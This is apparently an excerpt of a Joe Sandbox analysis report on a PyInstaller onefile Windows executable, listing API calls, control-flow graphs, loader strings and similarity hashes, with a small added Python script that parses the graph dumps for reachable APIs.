• GetOEMCP: 7ff72c671fe4; GetACP: 7ff72c671ffb; IsValidCodePage: 7ff72c6726d6; GetCPInfo: 7ff72c672119, 7ff72c672716; MultiByteToWideChar: 7ff72c66f8a0; WideCharToMultiByte: 7ff72c6707e8; LCMapStringW: 7ff72c66f193
• RtlLookupFunctionEntry: 7ff72c65caf2; RtlVirtualUnwind: 7ff72c65cb08; SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess: 7ff72c65c8a0
• EnterCriticalSection: 7ff72c6702d8, 7ff72c66546c; GetLastError: 7ff72c65835d, 7ff72c667bfe, 7ff72c667c7f, 7ff72c65477e, 7ff72c65649a, 7ff72c655852, 7ff72c65589b, 7ff72c6558c6, 7ff72c6558f1, 7ff72c65591f, 7ff72c6658a2
The remaining nodes in this portion of the graph are C runtime internals (memcpy_s, _invalid_parameter_noinfo, _fread_nolock, __vcrt_freefls, _log10_special, _CreateFrameInfo, __free_lconv_mon, __crtLCMapStringW, _isindst) and collapsed "N API calls" subgraphs.]

Control-flow Graph: function at 7ff72c6589e0 (the report renders this per-block graph interactively and marks each block Executed or Not Executed; that marking is not preserved in this text export). Each entry is block number: address range: calls made in the block → successor blocks.
• 0: 7ff72c6589e0-7ff72c658b26: call 7ff72c65c850, call 7ff72c659390, SetConsoleCtrlHandler, GetStartupInfoW, then three times (call 7ff72c6653f0, call 7ff72c66a47c, call 7ff72c66871c), GetCommandLineW, CreateProcessW → 23, 24
• 23: 7ff72c658b4d-7ff72c658b89: RegisterClassW → 26, 27
• 24: 7ff72c658b28-7ff72c658b48: GetLastError, call 7ff72c652c50 → 31
• 26: 7ff72c658b8b: GetLastError → 27
• 27: 7ff72c658b91-7ff72c658be5: CreateWindowExW → 29, 30
• 29: 7ff72c658be7-7ff72c658bed: GetLastError → 32
• 30: 7ff72c658bef-7ff72c658bf4: ShowWindow → 32
• 31: 7ff72c658e39-7ff72c658e5f: call 7ff72c65c550 (function exit)
• 32: 7ff72c658bfa-7ff72c658c0a: WaitForSingleObject → 34, 35
• 34: 7ff72c658c0c → 39
• 35: 7ff72c658c88-7ff72c658c8f → 36, 37
• 36: 7ff72c658cd2-7ff72c658cd9 → 42, 43
• 37: 7ff72c658c91-7ff72c658ca1: WaitForSingleObject → 40, 41
• 39: 7ff72c658c10-7ff72c658c13 → 44, 45
• 40: 7ff72c658df8-7ff72c658e02 → 49, 50
• 41: 7ff72c658ca7-7ff72c658cb7: TerminateProcess → 51, 52
• 42: 7ff72c658dc0-7ff72c658dd9: GetMessageW → 47, 48
• 43: 7ff72c658cdf-7ff72c658cf5: QueryPerformanceFrequency, QueryPerformanceCounter → 53
• 44: 7ff72c658c1b-7ff72c658c22 → 37, 46
• 45: 7ff72c658c15: GetLastError → 44
• 46: 7ff72c658c24-7ff72c658c41: PeekMessageW → 54, 55
• 47: 7ff72c658ddb-7ff72c658de9: TranslateMessage, DispatchMessageW → 48
• 48: 7ff72c658def-7ff72c658df6 → 40, 42
• 49: 7ff72c658e04-7ff72c658e0a: DestroyWindow → 50
• 50: 7ff72c658e11-7ff72c658e35: GetExitCodeProcess, CloseHandle (twice) → 31
• 51: 7ff72c658cb9: GetLastError → 52
• 52: 7ff72c658cbf-7ff72c658ccd: WaitForSingleObject → 40
• 53: 7ff72c658d00-7ff72c658d38: MsgWaitForMultipleObjects, PeekMessageW → 56, 57
• 54: 7ff72c658c43-7ff72c658c74: TranslateMessage, DispatchMessageW, PeekMessageW → 54, 55
• 55: 7ff72c658c76-7ff72c658c86: WaitForSingleObject → 35, 39
• 56: 7ff72c658d3a → 58
• 57: 7ff72c658d73-7ff72c658d7a → 42, 59
• 58: 7ff72c658d40-7ff72c658d71: TranslateMessage, DispatchMessageW, PeekMessageW → 57, 58
• 59: 7ff72c658d7c-7ff72c658da5: QueryPerformanceCounter → 53, 60
• 60: 7ff72c658dab-7ff72c658db2 → 40, 61
• 61: 7ff72c658db4-7ff72c658db8 → 42
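Both graphs in this report are exported as the same kind of token stream: a node is a decimal id followed by a virtual address (or an address range in the per-block graph), then free-form labels (a CRT symbol, a Win32 API name, "call <addr>", or "<n> API calls" where the report collapsed a subgraph), and an edge is written "src->dst". The parser below is an added example, not code from the report or from Joe Sandbox; it assumes only that grammar, which is inferred from the dump rather than documented here, and uses a PascalCase heuristic to tell Win32 API names from CRT internals. The first sample is taken verbatim from the edge list above (the CreateDirectoryW path); the second is an abridged excerpt of block 0 of the function at 7ff72c6589e0. It answers the questions an analyst usually asks of such a dump: which Win32 APIs are reachable from a given function, which blocks call a given API, and where the report collapsed subgraphs that still need to be expanded.

```python
"""Parse Joe Sandbox call-graph / control-flow-graph token streams.
Added example for this report; the grammar below is inferred from the dump."""
import re
from collections import defaultdict, deque

# Grammar assumed from the export: "<id> <addr>[-<addr>]" starts a node, "<src>-><dst>"
# is an edge, and every other token is label text belonging to the most recent node.
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]{8,16}(?:-[0-9a-f]{8,16})?$")   # report uses lowercase hex
API_RE = re.compile(r"^[A-Z][A-Za-z0-9]+$")                      # Win32 style: CreateFileW


def is_api(label):
    """Heuristic: Win32 exports are PascalCase; CRT internals start with '_' or lowercase."""
    return bool(API_RE.match(label)) and label != "API"


def parse_graph(text):
    """Return (nodes, edges); nodes maps id -> {"addr": str or None, "labels": [str]}."""
    tokens = text.split()
    nodes = defaultdict(lambda: {"addr": None, "labels": []})
    edges = set()
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            src, dst = m.groups()
            edges.add((src, dst))
            for n in (src, dst):
                nodes[n]                      # referenced node may be defined elsewhere
            i += 1
            continue
        if tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = tok                     # "<id> <addr>" opens a new node record
            nodes[current]["addr"] = tokens[i + 1]
            i += 2
            continue
        if current is not None:               # e.g. "CreateDirectoryW", "49", "API", "calls"
            nodes[current]["labels"].append(tok)
        i += 1
    return dict(nodes), edges


def api_calls(nodes):
    """Map each Win32 API name to the sorted addresses of the blocks that call it."""
    out = defaultdict(set)
    for nid, info in nodes.items():
        for lab in info["labels"]:
            if is_api(lab):
                out[lab].add(info["addr"] or nid)
    return {k: sorted(v) for k, v in out.items()}


def collapsed_calls(nodes):
    """'<n> API calls' labels mark subgraphs the report collapsed; return id -> n."""
    out = {}
    for nid, info in nodes.items():
        labs = info["labels"]
        for j in range(len(labs) - 2):
            if labs[j].isdigit() and labs[j + 1:j + 3] == ["API", "calls"]:
                out[nid] = int(labs[j])
    return out


def reachable_apis(nodes, edges, root):
    """Win32 APIs on any path from root; BFS with a seen-set, so message-pump cycles terminate."""
    succ = defaultdict(list)
    for s, d in edges:
        succ[s].append(d)
    seen, queue, found = {root}, deque([root]), set()
    while queue:
        n = queue.popleft()
        found.update(l for l in nodes.get(n, {"labels": []})["labels"] if is_api(l))
        for d in succ[n]:
            if d not in seen:
                seen.add(d)
                queue.append(d)
    return sorted(found)


# Sample 1: verbatim excerpt of the report's call-graph edge list (CreateDirectoryW path).
CALL_GRAPH_SAMPLE = (
    "17405 7ff72c6582d1 17409 7ff72c6582d9 17405->17409 17413 7ff72c6582ec 17405->17413 "
    "17410 7ff72c652810 49 API calls 17406->17410 17411 7ff72c652810 49 API calls 17409->17411 "
    "17410->17419 17411->17419 17412 7ff72c65834e CreateDirectoryW 17414 7ff72c65835d GetLastError "
    "17412->17414 17412->17419 17413->17412 17415 7ff72c6526b0 48 API calls 17413->17415 "
    "17414->17419 17417 7ff72c658328 CreateDirectoryW 17415->17417 17417->17413 17419->17399"
)
# Sample 2: abridged excerpt of the per-block graph for the function at 7ff72c6589e0.
CFG_SAMPLE = (
    "control_flow_graph 0 7ff72c6589e0-7ff72c658b26 call 7ff72c65c850 SetConsoleCtrlHandler "
    "GetStartupInfoW GetCommandLineW CreateProcessW 23 7ff72c658b4d-7ff72c658b89 RegisterClassW "
    "0->23 24 7ff72c658b28-7ff72c658b48 GetLastError call 7ff72c652c50 0->24 "
    "31 7ff72c658e39-7ff72c658e5f call 7ff72c65c550 24->31"
)

if __name__ == "__main__":
    nodes, edges = parse_graph(CALL_GRAPH_SAMPLE)
    print("APIs reachable from 17405:", reachable_apis(nodes, edges, "17405"))
    print("Blocks calling CreateDirectoryW:", api_calls(nodes)["CreateDirectoryW"])
    print("Collapsed subgraphs still to expand:", collapsed_calls(nodes))
    cfg_nodes, cfg_edges = parse_graph(CFG_SAMPLE)
    print("APIs reachable from block 0:", reachable_apis(cfg_nodes, cfg_edges, "0"))
```

The collapsed "N API calls" nodes are the caveat when reading either graph: a reachability answer is only complete for the portion the report expanded, so `collapsed_calls` is worth checking before concluding that a function does not reach, say, `CreateSymbolicLinkW`. Edges that point at ids defined in another part of the export (17406, 17419 and 17399 in the first sample) are kept as address-less nodes rather than dropped, so cross-references survive when the pieces are concatenated.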
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
• String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
• API String ID: 3832162212-3165540532
• Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
• Instruction ID: aeca1c47379d912acac750598a1b9216697a077a5fed72815e5a2203fa9fd90c
• Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
• Instruction Fuzzy Hash: 48D19631A08A8386E711AF34EC552ADB7A2FFA47A8F900635DA5D43A94DF3CD149CB10

Control-flow Graph

Control-flow graph (figure residue; the edge list is not reproduced): entry block 7ff72c651000-7ff72c653806, exit block 7ff72c653c97-7ff72c653cb2. Windows APIs called from blocks in this graph: SetDllDirectoryW, LoadLibraryExW, PostMessageW, GetMessageW.
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
• API String ID: 2776309574-3273434969
• Opcode ID: 56efb0c328102eab1d406dba677a265d22c75a80e3e063e6a6bdbd0eb2694019
• Instruction ID: 622d26e9a56d379b62f4068e735e4b703384393e3ae7f8cd4b57c91dcd2d8ece
• Opcode Fuzzy Hash: 56efb0c328102eab1d406dba677a265d22c75a80e3e063e6a6bdbd0eb2694019
• Instruction Fuzzy Hash: 49329F21A0C68251FA17F7249C552B9A7A3FF64BE0FE84436DB4D426C6DF2CE558CB20

Control-flow Graph

Control-flow graph (figure residue; the edge list is not reproduced): entry block 7ff72c676964-7ff72c6769d7, exit block 7ff72c676d32-7ff72c676d52. Windows APIs called from blocks in this graph: CreateFileW, GetFileType, GetLastError, CloseHandle.
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction ID: c9a6c08779169ed6fbac53a333c9f426242b0e566be1c14cde0df1f5ee08c69c
• Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction Fuzzy Hash: 69C10133B28A4285EB11EF64C8812AC7772FB99BA8F910639DE1E57794CF38D015CB10

Control-flow Graph

APIs
• FindFirstFileW.KERNELBASE(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C65842B
• RemoveDirectoryW.KERNEL32(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C6584AE
• DeleteFileW.KERNELBASE(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C6584CD
• FindNextFileW.KERNELBASE(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C6584DB
• FindClose.KERNEL32(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C6584EC
• RemoveDirectoryW.KERNELBASE(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C6584F5
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
• String ID: %s\*
• API String ID: 1057558799-766152087
                                                                                                                                                                                                                                  • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                  • Instruction ID: acfef818fa757435a00dbfbc73a2c9f3f3a68c5db68a1fd3ca24e20c6487c443
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A416521A0C54285EB61BB64E8441BAA362FFA87A4FD00631DB9D43AD4DF3CD549CF50
APIs
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
• Instruction ID: 99c73fc6a28612792b6c6d8362d0e314c348d17b3c172c1cdf7a5882f38cef59
• Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
• Instruction Fuzzy Hash: F6F0C822A1C74286F7619B60B889776B351FB94378F940735DA6D02AD4DF3CD059CE00

Control-flow Graph
APIs
• Part of subcall function 00007FF72C657F90: _fread_nolock.LIBCMT ref: 00007FF72C65803A
• _fread_nolock.LIBCMT ref: 00007FF72C651A1B
• Part of subcall function 00007FF72C652910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF72C651B6A), ref: 00007FF72C65295E
Strings
Similarity
• API ID: _fread_nolock$CurrentProcess
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 2397952137-3497178890
• Opcode ID: 75df882cb69919a76d97c614361eef51b2ec2ab8d5059f73c2ac4bb1c74e6529
• Instruction ID: 05d1e98607e00c0932de05aeb01288415088a65e3b3c311ea904c174ccc401cc
• Opcode Fuzzy Hash: 75df882cb69919a76d97c614361eef51b2ec2ab8d5059f73c2ac4bb1c74e6529
• Instruction Fuzzy Hash: D981D671A0C68286EB22FB14DC412B9B3A2FFA47A4FE04435DA8D43785DE3CE5458F60

Control-flow Graph
Strings
Similarity
• API ID: CurrentProcess
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
• API String ID: 2050909247-1550345328
• Opcode ID: d7e5a8d788c56064f5ee056adac7b7af7416d0cf868ad80b96a324f46d3978b4
• Instruction ID: 7a8256f425ef56693fea974cd6de1fa983b96e23732f8caa7f317c581f33775f
• Opcode Fuzzy Hash: d7e5a8d788c56064f5ee056adac7b7af7416d0cf868ad80b96a324f46d3978b4
• Instruction Fuzzy Hash: 02519061B0864392EA12BB119C111B9A3A2FFA07F4FE44535EE1C07BD6DE3CE5498F60

Control-flow Graph
APIs
• GetTempPathW.KERNEL32(?,?,00000000,00007FF72C653CBB), ref: 00007FF72C658704
• GetCurrentProcessId.KERNEL32(?,00000000,00007FF72C653CBB), ref: 00007FF72C65870A
• CreateDirectoryW.KERNELBASE(?,00000000,00007FF72C653CBB), ref: 00007FF72C65874C
• Part of subcall function 00007FF72C658830: GetEnvironmentVariableW.KERNEL32(00007FF72C65388E), ref: 00007FF72C658867
• Part of subcall function 00007FF72C658830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF72C658889
• Part of subcall function 00007FF72C668238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C668251
• Part of subcall function 00007FF72C652810: MessageBoxW.USER32 ref: 00007FF72C6528EA
Strings
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                  • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                  • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                  • Instruction ID: ccd400955c279738c84ebd1a9837a2eb1e4600d8e859cc44b92fd759b3684798
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35419011A1964244EA13FB619C552B9A253FFA97E0FE00535EE0D47ADADE3CE805CF60

Control-flow Graph (graph image omitted)
Similarity
• API ID: CurrentProcess
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2050909247-2813020118
• Opcode ID: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
• Instruction ID: d50ba084d5fe2f5b8fd5136801dc8979788115cb1ce4a556445b3f253009d73f
• Opcode Fuzzy Hash: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
• Instruction Fuzzy Hash: 1651D522A0864245E622FB11AC503BAE292FFA47E4FE44535EF4E477D5EE3CE545CB10

Control-flow Graph (graph image omitted)

APIs
• FreeLibrary.KERNEL32(?,?,?,00007FF72C66F0AA,?,?,-00000018,00007FF72C66AD53,?,?,?,00007FF72C66AC4A,?,?,?,00007FF72C665F3E), ref: 00007FF72C66EE8C
• GetProcAddress.KERNEL32(?,?,?,00007FF72C66F0AA,?,?,-00000018,00007FF72C66AD53,?,?,?,00007FF72C66AC4A,?,?,?,00007FF72C665F3E), ref: 00007FF72C66EE98
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
• Instruction ID: 4bc6771c35aad53dbe7e34b14185a0abb63c90f1c0af2297e5558ee2b09d60af
• Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
• Instruction Fuzzy Hash: 8841E62171964282EA17AB569C04575B2A2FF65BB0FE84539DD1D47784EE3CE40A8A20

Control-flow Graph (graph image omitted)

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF72C653804), ref: 00007FF72C6536E1
• GetLastError.KERNEL32(?,00007FF72C653804), ref: 00007FF72C6536EB
  • Part of subcall function 00007FF72C652C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF72C653706,?,00007FF72C653804), ref: 00007FF72C652C9E
  • Part of subcall function 00007FF72C652C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF72C653706,?,00007FF72C653804), ref: 00007FF72C652D63
  • Part of subcall function 00007FF72C652C50: MessageBoxW.USER32 ref: 00007FF72C652D99
Similarity
• API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 3187769757-2863816727
• Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
• Instruction ID: a21fb4b08906b3152e570bc7fccf02248fe77c7fd2e6215aee0efc2c8f7c518f
• Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
• Instruction Fuzzy Hash: 3C219461F18A4291FA22B720EC153B6A253FFA87B4FE40132D75D865D5EE2CE509CB24

Control-flow Graph (graph image omitted)
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                                                                                                                                                  • Instruction ID: 1fb64c4265ef5c98442378a9dd6faad2a8efac5e9508605bdbec03dfb8d90cd3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EDC1162290C687D1E762AB1198402BDBBB2FBE1BA0FE54138DA4D07791CF7CE4459F60

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 995526605-0
                                                                                                                                                                                                                                  • Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                  • Instruction ID: 4e9efa4256274eaa79a19353c0f60a9e941a94e07aa51b5e515e7b0f6c095f0c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7212521A0C64241EB51AB55B94423AE3A2FFD57F4FA00235E66D43AD4DE7CD4458F10

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658570: GetCurrentProcess.KERNEL32 ref: 00007FF72C658590
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658570: OpenProcessToken.ADVAPI32 ref: 00007FF72C6585A3
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658570: GetTokenInformation.KERNELBASE ref: 00007FF72C6585C8
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658570: GetLastError.KERNEL32 ref: 00007FF72C6585D2
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658570: GetTokenInformation.KERNELBASE ref: 00007FF72C658612
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF72C65862E
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658570: CloseHandle.KERNEL32 ref: 00007FF72C658646
                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,00007FF72C653C55), ref: 00007FF72C65916C
                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,00007FF72C653C55), ref: 00007FF72C659175
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                  • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                  • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                  • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                  • Instruction ID: 430de809b3fb511dda6bfa2792f7ff47d410db63dc1c24250cec4923645aa75c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4214F21A0874291E612BB10EC153EAA362FFA8790FE44435EA4D53BD6DF3CD805CB60
